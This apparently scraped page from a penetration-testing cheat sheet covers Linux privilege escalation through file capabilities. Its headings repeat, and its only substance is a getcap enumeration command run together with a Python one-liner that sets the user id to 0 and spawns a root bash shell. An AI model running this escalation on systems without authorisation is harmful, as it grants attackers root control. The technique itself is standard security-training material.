Capabilities
"Better" than SUID but vulnerable in the same way
What are Capabilities?
Enumeration
Python Capabilities

Last updated
"Better" than SUID but vulnerable in the same way

Last updated
getcap -r / 2>/dev/null/usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'